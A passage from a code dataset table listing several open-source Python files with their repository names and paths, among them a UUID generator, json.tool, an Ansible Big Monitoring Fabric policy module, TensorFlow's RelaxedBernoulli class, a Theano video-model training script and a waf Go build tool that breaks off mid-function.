repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
hujiajie/pa-chromium
|
refs/heads/master
|
remoting/tools/uuidgen.py
|
40
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
uuidgen.py -- UUID generation utility.
"""
import sys
import uuid
def main():
print uuid.uuid4()
return 0
if __name__ == '__main__':
sys.exit(main())
|
jchevin/MissionPlanner-master
|
refs/heads/master
|
Lib/json/tool.py
|
113
|
r"""Command-line tool to validate and pretty-print JSON
Usage::
$ echo '{"json":"obj"}' | python -m json.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m json.tool
Expecting property name: line 1 column 2 (char 2)
"""
import sys
import json
def main():
if len(sys.argv) == 1:
infile = sys.stdin
outfile = sys.stdout
elif len(sys.argv) == 2:
infile = open(sys.argv[1], 'rb')
outfile = sys.stdout
elif len(sys.argv) == 3:
infile = open(sys.argv[1], 'rb')
outfile = open(sys.argv[2], 'wb')
else:
raise SystemExit(sys.argv[0] + " [infile [outfile]]")
try:
obj = json.load(infile)
except ValueError, e:
raise SystemExit(e)
json.dump(obj, outfile, sort_keys=True, indent=4)
outfile.write('\n')
if __name__ == '__main__':
main()
|
adamwwt/chvac
|
refs/heads/master
|
venv/lib/python2.7/site-packages/sqlalchemy/dialects/drizzle/__init__.py
|
195
|
from sqlalchemy.dialects.drizzle import base, mysqldb
base.dialect = mysqldb.dialect
from sqlalchemy.dialects.drizzle.base import \
BIGINT, BINARY, BLOB, \
BOOLEAN, CHAR, DATE, \
DATETIME, DECIMAL, DOUBLE, \
ENUM, FLOAT, INTEGER, \
NUMERIC, REAL, TEXT, \
TIME, TIMESTAMP, VARBINARY, \
VARCHAR, dialect
__all__ = (
'BIGINT', 'BINARY', 'BLOB',
'BOOLEAN', 'CHAR', 'DATE',
'DATETIME', 'DECIMAL', 'DOUBLE',
'ENUM', 'FLOAT', 'INTEGER',
'NUMERIC', 'REAL', 'TEXT',
'TIME', 'TIMESTAMP', 'VARBINARY',
'VARCHAR', 'dialect'
)
|
dgarros/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/bigswitch/bigmon_policy.py
|
51
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Ansible module to manage Big Monitoring Fabric service chains
# (c) 2016, Ted Elhourani <ted@bigswitch.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: bigmon_policy
author: "Ted (@tedelhourani)"
short_description: Create and remove a bigmon out-of-band policy.
description:
- Create and remove a bigmon out-of-band policy.
version_added: "2.3"
options:
name:
description:
- The name of the policy.
required: true
policy_description:
description:
- Description of policy.
action:
description:
- Forward matching packets to delivery interfaces, Drop is for measure rate of matching packets,
but do not forward to delivery interfaces, capture packets and write to a PCAP file, or enable NetFlow generation.
default: forward
choices: ['forward', 'drop', 'flow-gen']
priority:
description:
- A priority associated with this policy. The higher priority policy takes precedence over a lower priority.
default: 100
duration:
description:
- Run policy for duration duration or until delivery_packet_count packets are delivered, whichever comes first.
default: 0
start_time:
description:
- Date the policy becomes active
default: ansible_date_time.iso8601
delivery_packet_count:
description:
- Run policy until delivery_packet_count packets are delivered.
default: 0
state:
description:
- Whether the policy should be present or absent.
default: present
choices: ['present', 'absent']
controller:
description:
- The controller address.
required: true
validate_certs:
description:
- If C(false), SSL certificates will not be validated. This should only be used
on personally controlled devices using self-signed certificates.
required: false
default: true
choices: [true, false]
access_token:
description:
- Bigmon access token. If this isn't set the the environment variable C(BIGSWITCH_ACCESS_TOKEN) is used.
'''
EXAMPLES = '''
- name: policy to aggregate filter and deliver data center (DC) 1 traffic
bigmon_policy:
name: policy1
policy_description: DC 1 traffic policy
action: drop
controller: '{{ inventory_hostname }}'
state: present
validate_certs: false
'''
RETURN = ''' # '''
import os
import datetime
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.bigswitch_utils import Rest, Response
from ansible.module_utils.pycompat24 import get_exception
def policy(module):
try:
access_token = module.params['access_token'] or os.environ['BIGSWITCH_ACCESS_TOKEN']
except KeyError:
e = get_exception()
module.fail_json(msg='Unable to load %s' % e.message)
name = module.params['name']
policy_description = module.params['policy_description']
action = module.params['action']
priority = module.params['priority']
duration = module.params['duration']
start_time = module.params['start_time']
delivery_packet_count = module.params['delivery_packet_count']
state = module.params['state']
controller = module.params['controller']
rest = Rest(module,
{'content-type': 'application/json', 'Cookie': 'session_cookie='+access_token},
'https://'+controller+':8443/api/v1/data/controller/applications/bigtap')
if name is None:
module.fail_json(msg='parameter `name` is missing')
response = rest.get('policy?config=true', data={})
if response.status_code != 200:
module.fail_json(msg="failed to obtain existing policy config: {}".format(response.json['description']))
config_present = False
matching = [policy for policy in response.json
if policy['name'] == name and
policy['duration'] == duration and
policy['delivery-packet-count'] == delivery_packet_count and
policy['policy-description'] == policy_description and
policy['action'] == action and
policy['priority'] == priority]
if matching:
config_present = True
if state in ('present') and config_present:
module.exit_json(changed=False)
if state in ('absent') and not config_present:
module.exit_json(changed=False)
if state in ('present'):
data={'name': name, 'action': action, 'policy-description': policy_description,
'priority': priority, 'duration': duration, 'start-time': start_time,
'delivery-packet-count': delivery_packet_count }
response = rest.put('policy[name="%s"]' % name, data=data)
if response.status_code == 204:
module.exit_json(changed=True)
else:
module.fail_json(msg="error creating policy '{}': {}".format(name, response.json['description']))
if state in ('absent'):
response = rest.delete('policy[name="%s"]' % name, data={})
if response.status_code == 204:
module.exit_json(changed=True)
else:
module.fail_json(msg="error deleting policy '{}': {}".format(name, response.json['description']))
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(type='str', required=True),
policy_description=dict(type='str', default=''),
action=dict(choices=['forward', 'drop', 'capture', 'flow-gen'], default='forward'),
priority=dict(type='int', default=100),
duration=dict(type='int', default=0),
start_time=dict(type='str', default=datetime.datetime.now().isoformat()+'+00:00'),
delivery_packet_count=dict(type='int', default=0),
controller=dict(type='str', required=True),
state=dict(choices=['present', 'absent'], default='present'),
validate_certs=dict(type='bool', default='True'),
access_token=dict(type='str', no_log=True)
)
)
try:
policy(module)
except Exception:
e = get_exception()
module.fail_json(msg=str(e))
if __name__ == '__main__':
main()
|
tornadozou/tensorflow
|
refs/heads/master
|
tensorflow/contrib/distributions/python/ops/relaxed_bernoulli.py
|
55
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The RelaxedBernoulli distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.distributions.python.ops import logistic
# Bijectors must be directly imported because `remove_undocumented` prevents
# individual file imports.
from tensorflow.contrib.distributions.python.ops.bijectors.sigmoid import Sigmoid
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops.distributions import transformed_distribution
from tensorflow.python.ops.distributions import util as distribution_util
class RelaxedBernoulli(transformed_distribution.TransformedDistribution):
"""RelaxedBernoulli distribution with temperature and logits parameters.
The RelaxedBernoulli is a distribution over the unit interval (0,1), which
continuously approximates a Bernoulli. The degree of approximation is
controlled by a temperature: as the temperaturegoes to 0 the RelaxedBernoulli
becomes discrete with a distribution described by the `logits` or `probs`
parameters, as the temperature goes to infinity the RelaxedBernoulli
becomes the constant distribution that is identically 0.5.
The RelaxedBernoulli distribution is a reparameterized continuous
distribution that is the binary special case of the RelaxedOneHotCategorical
distribution (Maddison et al., 2016; Jang et al., 2016). For details on the
binary special case see the appendix of Maddison et al. (2016) where it is
referred to as BinConcrete. If you use this distribution, please cite both
papers.
Some care needs to be taken for loss functions that depend on the
log-probability of RelaxedBernoullis, because computing log-probabilities of
the RelaxedBernoulli can suffer from underflow issues. In many case loss
functions such as these are invariant under invertible transformations of
the random variables. The KL divergence, found in the variational autoencoder
loss, is an example. Because RelaxedBernoullis are sampled by a Logistic
random variable followed by a `tf.sigmoid` op, one solution is to treat
the Logistic as the random variable and `tf.sigmoid` as downstream. The
KL divergences of two Logistics, which are always followed by a `tf.sigmoid`
op, is equivalent to evaluating KL divergences of RelaxedBernoulli samples.
See Maddison et al., 2016 for more details where this distribution is called
the BinConcrete.
An alternative approach is to evaluate Bernoulli log probability or KL
directly on relaxed samples, as done in Jang et al., 2016. In this case,
guarantees on the loss are usually violated. For instance, using a Bernoulli
KL in a relaxed ELBO is no longer a lower bound on the log marginal
probability of the observation. Thus care and early stopping are important.
#### Examples
Creates three continuous distributions, which approximate 3 Bernoullis with
probabilities (0.1, 0.5, 0.4). Samples from these distributions will be in
the unit interval (0,1).
```python
temperature = 0.5
p = [0.1, 0.5, 0.4]
dist = RelaxedBernoulli(temperature, probs=p)
```
Creates three continuous distributions, which approximate 3 Bernoullis with
logits (-2, 2, 0). Samples from these distributions will be in
the unit interval (0,1).
```python
temperature = 0.5
logits = [-2, 2, 0]
dist = RelaxedBernoulli(temperature, logits=logits)
```
Creates three continuous distributions, whose sigmoid approximate 3 Bernoullis
with logits (-2, 2, 0).
```python
temperature = 0.5
logits = [-2, 2, 0]
dist = Logistic(logits/temperature, 1./temperature)
samples = dist.sample()
sigmoid_samples = tf.sigmoid(samples)
# sigmoid_samples has the same distribution as samples from
# RelaxedBernoulli(temperature, logits=logits)
```
Creates three continuous distributions, which approximate 3 Bernoullis with
logits (-2, 2, 0). Samples from these distributions will be in
the unit interval (0,1). Because the temperature is very low, samples from
these distributions are almost discrete, usually taking values very close to 0
or 1.
```python
temperature = 1e-5
logits = [-2, 2, 0]
dist = RelaxedBernoulli(temperature, logits=logits)
```
Creates three continuous distributions, which approximate 3 Bernoullis with
logits (-2, 2, 0). Samples from these distributions will be in
the unit interval (0,1). Because the temperature is very high, samples from
these distributions are usually close to the (0.5, 0.5, 0.5) vector.
```python
temperature = 100
logits = [-2, 2, 0]
dist = RelaxedBernoulli(temperature, logits=logits)
```
Chris J. Maddison, Andriy Mnih, and Yee Whye Teh. The Concrete Distribution:
A Continuous Relaxation of Discrete Random Variables. 2016.
Eric Jang, Shixiang Gu, and Ben Poole. Categorical Reparameterization with
Gumbel-Softmax. 2016.
"""
def __init__(self,
temperature,
logits=None,
probs=None,
validate_args=False,
allow_nan_stats=True,
name="RelaxedBernoulli"):
"""Construct RelaxedBernoulli distributions.
Args:
temperature: An 0-D `Tensor`, representing the temperature
of a set of RelaxedBernoulli distributions. The temperature should be
positive.
logits: An N-D `Tensor` representing the log-odds
of a positive event. Each entry in the `Tensor` parametrizes
an independent RelaxedBernoulli distribution where the probability of an
event is sigmoid(logits). Only one of `logits` or `probs` should be
passed in.
probs: An N-D `Tensor` representing the probability of a positive event.
Each entry in the `Tensor` parameterizes an independent Bernoulli
distribution. Only one of `logits` or `probs` should be passed in.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
Raises:
ValueError: If both `probs` and `logits` are passed, or if neither.
"""
parameters = locals()
with ops.name_scope(name, values=[logits, probs, temperature]):
with ops.control_dependencies([check_ops.assert_positive(temperature)]
if validate_args else []):
self._temperature = array_ops.identity(temperature, name="temperature")
self._logits, self._probs = distribution_util.get_logits_and_probs(
logits=logits, probs=probs, validate_args=validate_args)
super(RelaxedBernoulli, self).__init__(
distribution=logistic.Logistic(
self._logits / self._temperature,
1. / self._temperature,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=name + "/Logistic"),
bijector=Sigmoid(validate_args=validate_args),
validate_args=validate_args,
name=name)
self._parameters = parameters
@staticmethod
def _param_shapes(sample_shape):
return {"logits": ops.convert_to_tensor(sample_shape, dtype=dtypes.int32)}
@property
def temperature(self):
"""Distribution parameter for the location."""
return self._temperature
@property
def logits(self):
"""Log-odds of `1`."""
return self._logits
@property
def probs(self):
"""Probability of `1`."""
return self._probs
|
Kazade/NeHe-Website
|
refs/heads/master
|
google_appengine/lib/django_1_2/django/contrib/gis/models.py
|
624
|
from django.db import connection
if (hasattr(connection.ops, 'spatial_version') and
not connection.ops.mysql):
# Getting the `SpatialRefSys` and `GeometryColumns`
# models for the default spatial backend. These
# aliases are provided for backwards-compatibility.
SpatialRefSys = connection.ops.spatial_ref_sys()
GeometryColumns = connection.ops.geometry_columns()
|
capybaralet/Sequential-Generation
|
refs/heads/master
|
TestRAMVideo.py
|
1
|
##################################################################
# Code for testing the variational Multi-Stage Generative Model. #
##################################################################
from __future__ import print_function, division
# basic python
import cPickle as pickle
from PIL import Image
import numpy as np
import numpy.random as npr
from collections import OrderedDict
import time
# theano business
import theano
import theano.tensor as T
# blocks stuff
from blocks.initialization import Constant, IsotropicGaussian, Orthogonal
from blocks.filter import VariableFilter
from blocks.graph import ComputationGraph
from blocks.roles import PARAMETER
from blocks.model import Model
from blocks.bricks import Tanh, Identity, Rectifier
from blocks.bricks.cost import BinaryCrossEntropy
from blocks.bricks.recurrent import SimpleRecurrent, LSTM
# phil's sweetness
import utils
from BlocksModels import *
from RAMBlocks import *
from DKCode import get_adam_updates, get_adadelta_updates
from load_data import load_udm, load_tfd, load_svhn_gray, load_binarized_mnist
from HelperFuncs import construct_masked_data, shift_and_scale_into_01, \
row_shuffle, to_fX, one_hot_np
from MotionRenderers import TrajectoryGenerator, ObjectPainter
RESULT_PATH = "RAM_TEST_RESULTS/"
def test_seq_cond_gen_sequence(step_type='add'):
##############################
# File tag, for output stuff #
##############################
result_tag = "{}VID_SCG".format(RESULT_PATH)
batch_size = 100
traj_len = 10
im_dim = 32
obs_dim = im_dim*im_dim
# configure a trajectory generator
x_range = [-0.8,0.8]
y_range = [-0.8,0.8]
max_speed = 0.15
TRAJ = TrajectoryGenerator(x_range=x_range, y_range=y_range, \
max_speed=max_speed)
# configure an object renderer
OPTR = ObjectPainter(im_dim, im_dim, obj_type='circle', obj_scale=0.2)
# get a Theano function for doing the rendering
_center_x = T.vector()
_center_y = T.vector()
_delta = T.vector()
_sigma = T.vector()
_W = OPTR.write(_center_y, _center_x, _delta, _sigma)
write_func = theano.function(inputs=[_center_y, _center_x, _delta, _sigma], \
outputs=_W)
def generate_batch(num_samples):
# generate a minibatch of trajectories
traj_pos, traj_vel = TRAJ.generate_trajectories(num_samples, traj_len)
traj_x = traj_pos[:,:,0]
traj_y = traj_pos[:,:,1]
# draw the trajectories
center_x = to_fX( traj_x.T.ravel() )
center_y = to_fX( traj_y.T.ravel() )
delta = to_fX( np.ones(center_x.shape) )
sigma = to_fX( np.ones(center_x.shape) )
W = write_func(center_y, center_x, delta, 0.05*sigma)
# shape trajectories into a batch for passing to the model
batch_imgs = np.zeros((num_samples, traj_len, obs_dim))
for i in range(num_samples):
start_idx = i * traj_len
end_idx = start_idx + traj_len
img_set = W[start_idx:end_idx,:]
batch_imgs[i,:,:] = img_set
batch_imgs = np.swapaxes(batch_imgs, 0, 1)
batch_imgs = to_fX( batch_imgs )
return batch_imgs
############################################################
# Setup some parameters for the Iterative Refinement Model #
############################################################
total_steps = traj_len
init_steps = 3
exit_rate = 0.0
nll_weight = 0.1
x_dim = obs_dim
y_dim = obs_dim
z_dim = 100
rnn_dim = 400
write_dim = 400
mlp_dim = 400
def visualize_attention(result, pre_tag="AAA", post_tag="AAA"):
seq_len = result[0].shape[0]
samp_count = result[0].shape[1]
# get generated predictions
x_samps = np.zeros((seq_len*samp_count, obs_dim))
idx = 0
for s1 in range(samp_count):
for s2 in range(seq_len):
x_samps[idx] = result[0][s2,s1,:]
idx += 1
file_name = "{0:s}_traj_xs_{1:s}.png".format(pre_tag, post_tag)
utils.visualize_samples(x_samps, file_name, num_rows=samp_count)
# get sequential attention maps
seq_samps = np.zeros((seq_len*samp_count, obs_dim))
idx = 0
for s1 in range(samp_count):
for s2 in range(seq_len):
seq_samps[idx] = result[1][s2,s1,:obs_dim] + result[1][s2,s1,obs_dim:]
idx += 1
file_name = "{0:s}_traj_att_maps_{1:s}.png".format(pre_tag, post_tag)
utils.visualize_samples(seq_samps, file_name, num_rows=samp_count)
# get sequential attention maps (read out values)
seq_samps = np.zeros((seq_len*samp_count, obs_dim))
idx = 0
for s1 in range(samp_count):
for s2 in range(seq_len):
seq_samps[idx] = result[2][s2,s1,:obs_dim] + result[2][s2,s1,obs_dim:]
idx += 1
file_name = "{0:s}_traj_read_outs_{1:s}.png".format(pre_tag, post_tag)
utils.visualize_samples(seq_samps, file_name, num_rows=samp_count)
return
rnninits = {
'weights_init': IsotropicGaussian(0.01),
'biases_init': Constant(0.),
}
inits = {
'weights_init': IsotropicGaussian(0.01),
'biases_init': Constant(0.),
}
read_N = 2 # inner/outer grid dimension for reader
reader_mlp = SimpleAttentionReader2d(x_dim=obs_dim, con_dim=rnn_dim,
width=im_dim, height=im_dim, N=read_N,
img_scale=1.0, att_scale=0.5,
**inits)
read_dim = reader_mlp.read_dim # total number of "pixels" read by reader
writer_mlp = MLP([None, None], [rnn_dim, write_dim, obs_dim], \
name="writer_mlp", **inits)
# mlps for processing inputs to LSTMs
con_mlp_in = MLP([Identity()], [ z_dim, 4*rnn_dim], \
name="con_mlp_in", **inits)
var_mlp_in = MLP([Identity()], [(y_dim + read_dim + rnn_dim), 4*rnn_dim], \
name="var_mlp_in", **inits)
gen_mlp_in = MLP([Identity()], [ (read_dim + rnn_dim), 4*rnn_dim], \
name="gen_mlp_in", **inits)
# mlps for turning LSTM outputs into conditionals over z_gen
con_mlp_out = CondNet([Rectifier(), Rectifier()], \
[rnn_dim, mlp_dim, mlp_dim, z_dim], \
name="con_mlp_out", **inits)
gen_mlp_out = CondNet([], [rnn_dim, z_dim], name="gen_mlp_out", **inits)
var_mlp_out = CondNet([], [rnn_dim, z_dim], name="var_mlp_out", **inits)
# LSTMs for the actual LSTMs (obviously, perhaps)
con_rnn = BiasedLSTM(dim=rnn_dim, ig_bias=2.0, fg_bias=2.0, \
name="con_rnn", **rnninits)
gen_rnn = BiasedLSTM(dim=rnn_dim, ig_bias=2.0, fg_bias=2.0, \
name="gen_rnn", **rnninits)
var_rnn = BiasedLSTM(dim=rnn_dim, ig_bias=2.0, fg_bias=2.0, \
name="var_rnn", **rnninits)
SeqCondGen_doc_str = \
"""
SeqCondGen -- constructs conditional densities under time constraints.
This model sequentially constructs a conditional density estimate by taking
repeated glimpses at the input x, and constructing a hypothesis about the
output y. The objective is maximum likelihood for (x,y) pairs drawn from
some training set. We learn a proper generative model, using variational
inference -- which can be interpreted as a sort of guided policy search.
The input pairs (x, y) can be either "static" or "sequential". In the
static case, the same x and y are used at every step of the hypothesis
construction loop. In the sequential case, x and y can change at each step
of the loop.
Parameters:
x_and_y_are_seqs: boolean telling whether the conditioning information
and prediction targets are sequential.
total_steps: total number of steps in sequential estimation process
init_steps: number of steps prior to first NLL measurement
exit_rate: probability of exiting following each non "init" step
**^^ THIS IS SET TO 0 WHEN USING SEQUENTIAL INPUT ^^**
nll_weight: weight for the prediction NLL term at each step.
**^^ THIS IS IGNORED WHEN USING STATIC INPUT ^^**
step_type: whether to use "additive" steps or "jump" steps
-- jump steps predict directly from the controller LSTM's
"hidden" state (a.k.a. its memory cells).
x_dim: dimension of inputs on which to condition
y_dim: dimension of outputs to predict
reader_mlp: used for reading from the input
writer_mlp: used for writing to the output prediction
con_mlp_in: preprocesses input to the "controller" LSTM
con_rnn: the "controller" LSTM
con_mlp_out: CondNet for distribution over z given con_rnn
gen_mlp_in: preprocesses input to the "generator" LSTM
gen_rnn: the "generator" LSTM
gen_mlp_out: CondNet for distribution over z given gen_rnn
var_mlp_in: preprocesses input to the "variational" LSTM
var_rnn: the "variational" LSTM
var_mlp_out: CondNet for distribution over z given gen_rnn
"""
SCG = SeqCondGen(
x_and_y_are_seqs=True,
total_steps=total_steps,
init_steps=init_steps,
exit_rate=exit_rate,
nll_weight=nll_weight,
step_type=step_type,
x_dim=obs_dim,
y_dim=obs_dim,
reader_mlp=reader_mlp,
writer_mlp=writer_mlp,
con_mlp_in=con_mlp_in,
con_mlp_out=con_mlp_out,
con_rnn=con_rnn,
gen_mlp_in=gen_mlp_in,
gen_mlp_out=gen_mlp_out,
gen_rnn=gen_rnn,
var_mlp_in=var_mlp_in,
var_mlp_out=var_mlp_out,
var_rnn=var_rnn)
SCG.initialize()
compile_start_time = time.time()
# build the attention trajectory sampler
SCG.build_attention_funcs()
# quick test of attention trajectory sampler
samp_count = 32
Xb = generate_batch(samp_count)
result = SCG.sample_attention(Xb, Xb)
result[0] = Xb
visualize_attention(result, pre_tag=result_tag, post_tag="b0")
# build the main model functions (i.e. training and cost functions)
SCG.build_model_funcs()
compile_end_time = time.time()
compile_minutes = (compile_end_time - compile_start_time) / 60.0
print("THEANO COMPILE TIME (MIN): {}".format(compile_minutes))
#SCG.load_model_params(f_name="SCG_params.pkl")
################################################################
# Apply some updates, to check that they aren't totally broken #
################################################################
print("Beginning to train the model...")
out_file = open("{}_results.txt".format(result_tag), 'wb')
out_file.flush()
costs = [0. for i in range(10)]
learn_rate = 0.0001
momentum = 0.9
for i in range(250000):
scale = min(1.0, ((i+1) / 2000.0))
if (((i + 1) % 10000) == 0):
learn_rate = learn_rate * 0.95
if (i > 5000):
momentum = 0.95
else:
momentum = 0.9
# set sgd and objective function hyperparams for this update
SCG.set_sgd_params(lr=learn_rate, mom_1=momentum, mom_2=0.99)
SCG.set_lam_kld(lam_kld_q2p=0.95, lam_kld_p2q=0.05, lam_kld_p2g=0.0)
# perform a minibatch update and record the cost for this batch
Xb = generate_batch(batch_size)
result = SCG.train_joint(Xb, Xb)
costs = [(costs[j] + result[j]) for j in range(len(result))]
# output diagnostic information and checkpoint parameters, etc.
if ((i % 100) == 0):
costs = [(v / 100.0) for v in costs]
str1 = "-- batch {0:d} --".format(i)
str2 = " total_cost: {0:.4f}".format(costs[0])
str3 = " nll_bound : {0:.4f}".format(costs[1])
str4 = " nll_term : {0:.4f}".format(costs[2])
str5 = " kld_q2p : {0:.4f}".format(costs[3])
str6 = " kld_p2q : {0:.4f}".format(costs[4])
str7 = " kld_p2g : {0:.4f}".format(costs[5])
str8 = " reg_term : {0:.4f}".format(costs[6])
joint_str = "\n".join([str1, str2, str3, str4, str5, str6, str7, str8])
print(joint_str)
out_file.write(joint_str+"\n")
out_file.flush()
costs = [0.0 for v in costs]
if ((i % 200) == 0):
SCG.save_model_params("{}_params.pkl".format(result_tag))
# compute a small-sample estimate of NLL bound on validation set
samp_count = 128
Xb = generate_batch(samp_count)
va_costs = SCG.compute_nll_bound(Xb, Xb)
str1 = " va_nll_bound : {}".format(va_costs[1])
str2 = " va_nll_term : {}".format(va_costs[2])
str3 = " va_kld_q2p : {}".format(va_costs[3])
joint_str = "\n".join([str1, str2, str3])
print(joint_str)
out_file.write(joint_str+"\n")
out_file.flush()
###########################################
# Sample and draw attention trajectories. #
###########################################
samp_count = 32
Xb = generate_batch(samp_count)
result = SCG.sample_attention(Xb, Xb)
post_tag = "b{0:d}".format(i)
visualize_attention(result, pre_tag=result_tag, post_tag=post_tag)
if __name__=="__main__":
test_seq_cond_gen_sequence(step_type='add')
|
mattaw/SoCFoundationFlow
|
refs/heads/master
|
admin/waf/waf-1.8.19/waflib/extras/go.py
|
4
|
#!/usr/bin/env python
# encoding: utf-8
# Tom Wambold tom5760 gmail.com 2009
# Thomas Nagy 2010
"""
Go as a language may look nice, but its toolchain is one of the worse a developer
has ever seen. It keeps changing though, and I would like to believe that it will get
better eventually, but the crude reality is that this tool and the examples are
getting broken every few months.
If you have been lured into trying to use Go, you should stick to their Makefiles.
"""
import os, platform
from waflib import Utils, Task, TaskGen
from waflib.TaskGen import feature, extension, after_method, before_method
from waflib.Tools.ccroot import link_task, stlink_task, propagate_uselib_vars, process_use
class go(Task.Task):
run_str = '${GOC} ${GOCFLAGS} ${CPPPATH_ST:INCPATHS} -o ${TGT} ${SRC}'
class gopackage(stlink_task):
run_str = '${GOP} grc ${TGT} ${SRC}'
class goprogram(link_task):
run_str = '${GOL} ${GOLFLAGS} -o ${TGT} ${SRC}'
inst_to = '${BINDIR}'
chmod = Utils.O755
class cgopackage(stlink_task):
color = 'YELLOW'
inst_to = '${LIBDIR}'
ext_in = ['.go']
ext_out = ['.a']
def run(self):
src_dir = self.generator.bld.path
source = self.inputs
target = self.outputs[0].change_ext('')
#print ("--> %s" % self.outputs)
#print ('++> %s' % self.outputs[1])
bld_dir = self.outputs[1]
bld_dir.mkdir()
obj_dir = bld_dir.make_node('_obj')
obj_dir.mkdir()
bld_srcs = []
for s in source:
# FIXME: it seems gomake/cgo stumbles on filenames like a/b/c.go
# -> for the time being replace '/' with '_'...
#b = bld_dir.make_node(s.path_from(src_dir))
b = bld_dir.make_node(s.path_from(src_dir).replace(os.sep,'_'))
b.parent.mkdir()
#print ('++> %s' % (s.path_from(src_dir),))
try:
try:os.remove(b.abspath())
except Exception:pass
os.symlink(s.abspath(), b.abspath())
except Exception:
# if no support for symlinks, copy the file from src
b.write(s.read())
bld_srcs.append(b)
#print("--|> [%s]" % b.abspath())
b.sig = Utils.h_file(b.abspath())
pass
#self.set_inputs(bld_srcs)
#self.generator.bld.raw_deps[self.uid()] = [self.signature()] + bld_srcs
makefile_node = bld_dir.make_node("Makefile")
makefile_tmpl = '''\
# Copyright 2009 The Go Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file. ---
include $(GOROOT)/src/Make.inc
TARG=%(target)s
GCIMPORTS= %(gcimports)s
CGOFILES=\\
\t%(source)s
CGO_CFLAGS= %(cgo_cflags)s
CGO_LDFLAGS= %(cgo_ldflags)s
include $(GOROOT)/src/Make.pkg
%%: install %%.go
$(GC) $*.go
$(LD) -o $@ $*.$O
''' % {
'gcimports': ' '.join(l for l in self.env['GOCFLAGS']),
'cgo_cflags' : ' '.join(l for l in self.env['GOCFLAGS']),
'cgo_ldflags': ' '.join(l for l in self.env['GOLFLAGS']),
'target': target.path_from(obj_dir),
'source': ' '.join([b.path_from(bld_dir) for b in bld_srcs])
}
makefile_node.write(makefile_tmpl)
#print ("::makefile: %s"%makefile_node.abspath())
cmd = Utils.subst_vars('gomake ${GOMAKE_FLAGS}', self.env).strip()
o = self.outputs[0].change_ext('.gomake.log')
fout_node = bld_dir.find_or_declare(o.name)
fout = open(fout_node.abspath(), 'w')
rc = self.generator.bld.exec_command(
cmd,
stdout=fout,
stderr=fout,
cwd=bld_dir.abspath(),
)
if rc != 0:
import waflib.Logs as msg
msg.error('** error running [%s] (cgo-%s)' % (cmd, target))
msg.error(fout_node.read())
return rc
self.generator.bld.read_stlib(
target,
paths=[obj_dir.abspath(),],
)
tgt = self.outputs[0]
if tgt.parent != obj_dir:
install_dir = os.path.join('${LIBDIR}',
tgt.parent.path_from(obj_dir))
else:
install_dir = '${LIBDIR}'
#print('===> %s (%s)' % (tgt.abspath(), install_dir))
self.generator.bld.install_files(
install_dir,
tgt.abspath(),
relative_trick=False,
postpone=False,
)
return rc
@extension('.go')
def compile_go(self, node):
#print('*'*80, self.name)
if not ('cgopackage' in self.features):
return self.create_compiled_task('go', node)
#print ('compile_go-cgo...')
#bld_dir = node.parent.get_bld()
#obj_dir = bld_dir.make_node('_obj')
return self.create_task('cgopackage', node, node.change_ext('.a'))
@feature('gopackage', 'goprogram', 'cgopackage')
@before_method('process_source')
def go_compiler_is_foobar(self):
if self.env.GONAME == 'gcc':
return
self.source = self.to_nodes(self.source)
src = []
go = []
for node in self.source:
if node.name.endswith('.go'):
go.append(node)
else:
src.append(node)
self.source = src
if not ('cgopackage' in self.features):
#print('--> [%s]... (%s)' % (go[0], getattr(self, 'target', 'N/A')))
tsk = self.create_compiled_task('go', go[0])
tsk.inputs.extend(go[1:])
else:
#print ('+++ [%s] +++' % self.target)
bld_dir = self.path.get_bld().make_node('cgopackage--%s' % self.target.replace(os.sep,'_'))
obj_dir = bld_dir.make_node('_obj')
target = obj_dir.make_node(self.target+'.a')
tsk = self.create_task('cgopackage', go, [target, bld_dir])
self.link_task = tsk
@feature('gopackage', 'goprogram', 'cgopackage')
@after_method('process_source', 'apply_incpaths',)
def go_local_libs(self):
names = self.to_list(getattr(self, 'use', []))
#print ('== go-local-libs == [%s] == use: %s' % (self.name, names))
for name in names:
tg = self.bld.get_tgen_by_name(name)
if not tg:
raise Utils.WafError('no target of name %r necessary for %r in go uselib local' % (name, self))
tg.post()
#print ("-- tg[%s]: %s" % (self.name,name))
lnk_task = getattr(tg, 'link_task', None)
if lnk_task:
for tsk in self.tasks:
